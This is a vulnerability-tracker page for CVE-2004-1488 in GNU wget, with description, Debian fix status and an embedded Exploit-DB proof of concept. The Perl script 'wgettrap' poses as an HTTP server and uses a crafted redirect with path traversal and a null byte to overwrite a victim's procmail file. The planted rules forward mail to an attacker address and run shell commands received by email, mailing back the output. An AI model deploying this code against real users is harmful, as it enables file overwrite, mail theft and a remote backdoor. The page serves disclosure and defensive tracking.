CVE-2004-1488

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

wget 1.8.x and 1.9.x does not filter or quote control characters when displaying HTTP responses to the terminal, which may allow remote malicious web servers to inject terminal escape sequences and execute arbitrary code.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24813 remote linux verified text · 4 KB

Jan Minar · 2004-12-10

GNU Wget 1.x - Multiple Vulnerabilities

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/11871/info

Multiple remote vulnerabilities reportedly affect GNU wget. These issues are due to the application's failure to properly sanitize user-supplied input and to properly validate the presence of files before writing to them. The issues include:

- a potential directory-traversal issue
- an arbitrary file-overwriting vulnerability
- a weakness caused by the application's failure to filter potentially malicious characters from server-supplied input. 

Via a malicious server, an attacker may exploit these issues to arbitrarily overwrite files within the current directory and potentially outside of it. This may let the attacker corrupt files, cause a denial of service, and possibly launch further attacks against the affected computer. Overwriting of files would take place with the privileges of the user that activates the vulnerable application.


--
 )^o-o^|    jabber: rdancer@NJS.NetLab.Cz
 | .v  K    e-mail: jjminar FastMail FM
 `  - .'     phone: +44(0)7981 738 696
  \ __/Jan     icq: 345 355 493
 __|o|__Min??  irc: rdancer@IRC.FreeNode.Net

#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min???? (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'
# 8-)).

use POSIX qw(strftime);

# This is our scheme/host/port
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server = "http://..";

# Wanna know who got infected?
#$log = "/dev/pts/1";

# The filename we will try to overwrite on the target system
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";

############### Payload #########################################
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
* ^X-Wgettrap-Command: shell
* ^X-Wgettrap-Password: $password
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'
EOP
chomp $payload;
############### Payload #########################################

# A simple directory traversal, for greater effect
$trick = "/.." . "%2f.." x 40;

open LOG, ">$log" if $log;

while(<STDIN>){
        print LOG $_ if $log;
        if (/\Q$trick$filename\E/) {
        #if (/%2f/) {
                # We see the filename, so this is the second time
                # they're here.  Time to feed the sploit.
                $second++;
        } elsif (/^Range: bytes=\(33\)-/) {
                # Appending goes like this:
                # (1) Tell'em what you're gonna tell'em
                # (2) Then tell'em just a half
                # (3) Close it
                # (4) Wait
                # (5) They're comin' back, with wget -c
                # (6) Tell'em the sploit
                # (7) Close again
                # (8) Wtf? They're comin' back with wget -c again
                # (9) Tell'em the rest...
                # (10) ... enjoying the backdoor at the same time
                print LOG "File if $1 bytes long\n" if $log;
        } elsif (/^\r?$/) {
                # The HTTP headers are over.  Let's do it!
                $date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
                if (!$second) {
                        # Print the payload
                        print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
                } else {
                        # Print the redirection
                        print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
                }
                exit 0;
        }
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.9.1-11`
sid	Fixed	`1.9.1-11`
forky	Fixed	`1.9.1-11`
bullseye	Fixed	`1.9.1-11`
bookworm	Fixed	`1.9.1-11`

References

https://security-tracker.debian.org/tracker/CVE-2004-1488

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.